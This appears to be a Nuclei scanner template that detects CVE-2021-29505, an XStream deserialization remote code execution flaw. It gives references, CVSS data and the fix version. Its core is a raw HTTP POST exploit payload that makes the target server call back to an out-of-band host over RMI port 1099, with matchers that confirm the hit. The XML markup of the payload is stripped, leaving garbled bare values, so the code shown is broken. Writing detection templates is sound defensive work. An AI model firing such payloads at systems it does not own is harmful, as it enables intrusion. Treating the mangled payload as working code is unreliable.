id: CVE-2021-29505 info: name: XStream <1.4.17 - Remote Code Execution author: pwnhxl severity: high description: | XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. reference: - https://paper.seebug.org/1543/ - https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29505 - https://github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fc - https://nvd.nist.gov/vuln/detail/cve-2021-29505 remediation: Patched in 1.4.17. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2021-29505 cwe-id: CWE-94,CWE-502 epss-score: 0.02373 tags: oast,vulhub,cve,cve2021,xstream,deserialization,rce metadata: max-request: 1 http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml 2 3 12345 com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content 12345 true SOAP_11 false aa aa UnicastRef {{interactsh-url}} 1099 0 0 0 0 false {{interactsh-url}} 1099 matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - "timestamp" - "com.thoughtworks.xstream" condition: or - type: word part: header words: - "application/json" - type: status status: - 500 # Enhanced by md on 2023/04/13